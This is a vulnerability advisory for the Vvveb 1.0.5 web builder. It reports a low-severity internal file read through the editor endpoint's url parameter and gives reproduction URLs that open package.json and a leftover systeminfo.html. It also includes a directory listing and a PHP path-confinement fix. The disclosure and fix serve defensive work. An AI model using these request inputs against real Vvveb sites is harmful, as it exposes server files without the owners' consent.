Vvveb 1.0.5 | Internal file read via drag-and-drop editor

Information

Software Type: Web App
Software Name: Vvveb
Affected Version: 1.0.5
Software Vendor: Vvveb
Software Link: https://github.com/givanz/Vvveb
Severity: Low
CVSS Score: 3.5
CVE Link: Pending
Affected Assets: 163+
Date of Discovery: Jan 3rd, 2025
PoC Exploit: N/A

Description

The endpoint at [/vadmin123/index.php?module=editor/editor&url=/&template=index.html] is vulnerable to an internal file read. The url parameter lets the editor open files left over from an older Vvveb version that are still present on the server.
Its current severity is low because I wasn't able to read sensitive files.


Reproduce

Log in as an editor or any user with access to the “Edit website” functionality. Open the following endpoint:
http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=/&template=index.html

Change the url parameter so the request reads:
http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=index.html

This opens files located under the following server path:
/var/www/html/public/admin/default

I found this file by searching for a keyword I had found on index.html [editor/editor&url=index.html]:
find . -type f -exec grep -l 'Vvveb 0.2 is now available!' {} +

This directory contains the following files:

/var/www/html/public/admin/default # ls -la

total 448
drwx-wx-wx   22 www-data www-data      4096 Jan  3 14:56 .
drwx-wx-wx    3 www-data www-data      4096 Jan  3 14:57 ..
-rwx-wx-wx    1 www-data www-data     10173 Jan  3 14:56 LICENSE
-rwx-wx-wx    1 www-data www-data      5378 Jan  3 14:56 README.md
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 admin
drwx-wx-wx    3 www-data www-data      4096 Jan  3 14:56 content
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 css
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 editor
drwx-wx-wx    4 www-data www-data      4096 Jan  3 14:56 email
-rwx-wx-wx    1 www-data www-data     73835 Jan  3 14:56 error403.html
-rwx-wx-wx    1 www-data www-data     73408 Jan  3 14:56 error404.html
-rwx-wx-wx    1 www-data www-data     74142 Jan  3 14:56 error500.html
-rwx-wx-wx    1 www-data www-data      3150 Jan  3 14:56 favicon.ico
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 field
drwx-wx-wx    2 www-data www-data      4096 Jan  3 14:56 fields

You can open files for reading. I was able to read package.json:
http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=package.json

Some old files like systeminfo.html may provide information about old configuration used by the web app:
http://127.0.0.1/vadmin123/index.php?module=editor/editor&url=tools/systeminfo.html
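As an added, defender-side example (not Vvveb's own code), the following PHP function shows the kind of check an editor endpoint needs before opening a user-supplied url parameter: canonicalize the requested name against one intended template root and refuse anything that resolves outside it, so leftover files such as the admin/default contents above cannot be reached through the editor. The function name, the template root path, the character whitelist and the allowed extensions are assumptions for illustration.

```php
<?php
// Added example (not Vvveb's code): confine an editor "url" parameter to files
// below one allowed template root. All names and paths here are hypothetical.

function resolveTemplateFile(string $templateRoot, string $requested): ?string
{
    // Canonicalize the root once; realpath() also resolves symlinks.
    $root = realpath($templateRoot);
    if ($root === false) {
        return null;
    }
    $root = rtrim($root, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;

    // Reject empty names, NUL bytes and absolute paths before touching the filesystem.
    if ($requested === '' || strpos($requested, "\0") !== false || $requested[0] === '/') {
        return null;
    }

    // Allow only a conservative character set in the relative path.
    if (!preg_match('#^[A-Za-z0-9_./-]+$#', $requested)) {
        return null;
    }

    // Resolve the candidate; a non-existent path (or one that leaves the
    // root through a symlink) yields false here.
    $candidate = realpath($root . $requested);
    if ($candidate === false) {
        return null;
    }

    // The canonical path must still lie under the canonical root.
    if (strncmp($candidate, $root, strlen($root)) !== 0) {
        return null;
    }

    // Serve only regular files with an expected template extension.
    $ext = pathinfo($candidate, PATHINFO_EXTENSION);
    if (!is_file($candidate) || !in_array($ext, ['html', 'tpl'], true)) {
        return null;
    }

    return $candidate;
}

// Usage sketch for a hypothetical request handler:
// $file = resolveTemplateFile('/var/www/html/public/themes/default', $_GET['url'] ?? '');
// if ($file === null) { http_response_code(404); exit; }
// readfile($file);
```

With this check, a request such as url=/ is rejected as an absolute path, a name that canonicalizes to a sibling directory fails the prefix comparison, and a file outside the whitelisted extensions (package.json, for instance) is refused even when it sits inside the root. The prefix comparison on realpath() output, rather than string filtering alone, is what makes the check robust against symlinks and mixed "./" and "../" segments.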

Proof of Concept (PoC) Video


Posted on: January 10, 2025 11:22 PM